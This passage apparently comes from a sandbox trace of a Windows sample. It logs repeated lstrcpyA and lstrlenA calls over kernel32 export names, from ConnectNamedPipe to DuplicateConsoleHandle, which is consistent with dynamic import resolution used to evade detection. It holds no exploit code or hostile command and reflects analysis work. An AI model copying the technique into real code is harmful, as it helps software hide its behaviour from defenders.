lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0184.591] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0184.591] lstrcpyA (in: lpString1=0x36fc938, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0184.591] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0184.591] lstrcpyA (in: lpString1=0x36fc938, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0184.591] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0184.591] lstrcpyA (in: lpString1=0x36fc938, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0184.591] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0184.591] lstrcpyA (in: lpString1=0x36fc938, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0184.591] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0184.591] lstrcpyA (in: lpString1=0x36fc938, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0184.591] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0184.591] lstrcpyA (in: lpString1=0x36fc938, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0184.591] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0184.591] lstrcpyA (in: lpString1=0x36fc938, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0184.591] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0184.591] lstrcpyA (in: lpString1=0x36fc938, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0184.591] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0184.591] lstrcpyA (in: lpString1=0x36fc938, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0184.591] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0184.591] lstrcpyA (in: lpString1=0x36fc938, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0184.591] lstrlenA (lpString="COPYCONTEXT") returned 11 [0184.591] lstrcpyA (in: lpString1=0x36fc938, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0184.591] lstrlenA (lpString="COPYFILEA") returned 9 [0184.591] lstrcpyA (in: lpString1=0x36fc938, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0184.591] lstrlenA (lpString="COPYFILEEXA") returned 11 [0184.591] lstrcpyA (in: lpString1=0x36fc938, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0184.591] lstrlenA (lpString="COPYFILEEXW") returned 11 [0184.591] lstrcpyA (in: lpString1=0x36fc938, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0184.591] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0184.591] lstrcpyA (in: lpString1=0x36fc938, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0184.591] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0184.591] lstrcpyA (in: lpString1=0x36fc938, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0184.592] lstrlenA (lpString="COPYFILEW") returned 9 [0184.592] lstrcpyA (in: lpString1=0x36fc938, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0184.592] lstrlenA (lpString="COPYLZFILE") returned 10 [0184.592] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0184.592] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0184.592] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0184.592] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0184.592] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0184.592] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0184.592] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0184.592] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0184.592] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0184.592] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0184.592] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0184.592] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0184.592] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0184.592] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0184.592] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0184.592] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0184.592] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0184.592] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0184.592] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0184.592] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0184.592] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0184.592] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0184.592] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0184.592] lstrlenA (lpString="CREATEEVENTA") returned 12 [0184.592] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0184.592] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0184.592] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0184.592] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0184.592] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0184.592] lstrlenA (lpString="CREATEEVENTW") returned 12 [0184.592] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0184.592] lstrlenA (lpString="CREATEFIBER") returned 11 [0184.592] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0184.592] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0184.592] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0184.593] lstrlenA (lpString="CREATEFILEA") returned 11 [0184.593] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0184.593] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0184.593] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0184.593] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0184.593] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0184.593] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0184.593] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0184.593] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0184.593] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0184.593] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0184.593] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0184.593] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0184.593] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0184.593] lstrlenA (lpString="CREATEFILEW") returned 11 [0184.593] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0184.593] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0184.593] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0184.593] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0184.593] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0184.593] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0184.593] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0184.593] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0184.593] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0184.593] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0184.593] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0184.593] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0184.593] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0184.593] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0184.593] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0184.593] lstrlenA (lpString="CREATEJOBSET") returned 12 [0184.593] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0184.593] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0184.593] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0184.593] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0184.593] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0184.593] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0184.594] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0184.594] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0184.594] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0184.594] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0184.594] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0184.594] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0184.594] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0184.594] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0184.594] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0184.594] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0184.594] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0184.594] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0184.594] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0184.594] lstrlenA (lpString="CREATEPIPE") returned 10 [0184.594] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0184.594] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0184.594] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0184.594] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0184.594] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0184.594] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0184.594] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0184.594] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0184.594] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0184.594] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0184.594] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0184.594] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0184.594] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0184.594] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0184.594] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0184.594] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0184.594] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0184.594] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0184.594] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0184.594] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0184.594] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0184.594] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0184.594] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0184.594] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0184.595] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0184.595] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0184.595] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0184.595] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0184.595] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0184.595] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0184.595] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0184.595] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0184.595] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0184.595] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0184.595] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0184.595] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0184.595] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0184.595] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0184.595] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0184.595] lstrlenA (lpString="CREATETHREAD") returned 12 [0184.595] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0184.595] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0184.595] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0184.595] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0184.595] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0184.595] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0184.595] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0184.595] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0184.595] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0184.595] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0184.595] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0184.595] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0184.595] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0184.595] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0184.595] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0184.595] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0184.595] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0184.595] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0184.595] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0184.595] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0184.595] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0184.596] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0184.596] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0184.596] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0184.596] lstrcpyA (in: lpString1=0x36fc938, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0184.596] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0184.596] lstrcpyA (in: lpString1=0x36fc938, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0184.596] lstrlenA (lpString="CTRLROUTINE") returned 11 [0184.596] lstrcpyA (in: lpString1=0x36fc938, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0184.596] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0184.596] lstrcpyA (in: lpString1=0x36fc938, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0184.596] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0184.596] lstrcpyA (in: lpString1=0x36fc938, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0184.596] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0184.596] lstrcpyA (in: lpString1=0x36fc938, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0184.596] lstrlenA (lpString="DEBUGBREAK") returned 10 [0184.596] lstrcpyA (in: lpString1=0x36fc938, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0184.596] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0184.596] lstrcpyA (in: lpString1=0x36fc938, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0184.596] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0184.596] lstrcpyA (in: lpString1=0x36fc938, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0184.596] lstrlenA (lpString="DECODEPOINTER") returned 13 [0184.596] lstrcpyA (in: lpString1=0x36fc938, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0184.596] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0184.596] lstrcpyA (in: lpString1=0x36fc938, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0184.596] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0184.596] lstrcpyA (in: lpString1=0x36fc938, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0184.596] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0184.596] lstrcpyA (in: lpString1=0x36fc938, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0184.596] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0184.596] lstrcpyA (in: lpString1=0x36fc938, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0184.596] lstrlenA (lpString="DELETEATOM") returned 10 [0184.596] lstrcpyA (in: lpString1=0x36fc938, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0184.596] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0184.596] lstrcpyA (in: lpString1=0x36fc938, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0184.596] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0184.596] lstrcpyA (in: lpString1=0x36fc938, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0184.596] lstrlenA (lpString="DELETEFIBER") returned 11 [0184.597] lstrcpyA (in: lpString1=0x36fc938, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0184.597] lstrlenA (lpString="DELETEFILEA") returned 11 [0184.597] lstrcpyA (in: lpString1=0x36fc938, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0184.597] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0184.597] lstrcpyA (in: lpString1=0x36fc938, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0184.597] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0184.597] lstrcpyA (in: lpString1=0x36fc938, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0184.597] lstrlenA (lpString="DELETEFILEW") returned 11 [0184.597] lstrcpyA (in: lpString1=0x36fc938, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0184.597] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0184.597] lstrcpyA (in: lpString1=0x36fc938, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0184.597] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0184.597] lstrcpyA (in: lpString1=0x36fc938, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0184.597] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0184.597] lstrcpyA (in: lpString1=0x36fc938, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0184.597] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0184.597] lstrcpyA (in: lpString1=0x36fc938, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0184.597] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0184.597] lstrcpyA (in: lpString1=0x36fc938, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0184.597] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0184.597] lstrcpyA (in: lpString1=0x36fc938, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0184.597] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0184.597] lstrcpyA (in: lpString1=0x36fc938, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0184.597] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0184.597] lstrcpyA (in: lpString1=0x36fc938, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0184.597] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0184.597] lstrcpyA (in: lpString1=0x36fc938, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0184.597] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0184.597] lstrcpyA (in: lpString1=0x36fc938, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0184.597] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0184.597] lstrcpyA (in: lpString1=0x36fc938, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0184.597] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0184.597] lstrcpyA (in: lpString1=0x36fc938, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0184.597] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0184.597] lstrcpyA (in: lpString1=0x36fc938, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0184.597] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0184.597] lstrcpyA (in: lpString1=0x36fc938, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0184.597] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0184.598] lstrcpyA (in: lpString1=0x36fc938, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0184.598] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0184.598] lstrcpyA (in: lpString1=0x36fc938, lpString2="DuplicateConsoleHandle" | out: 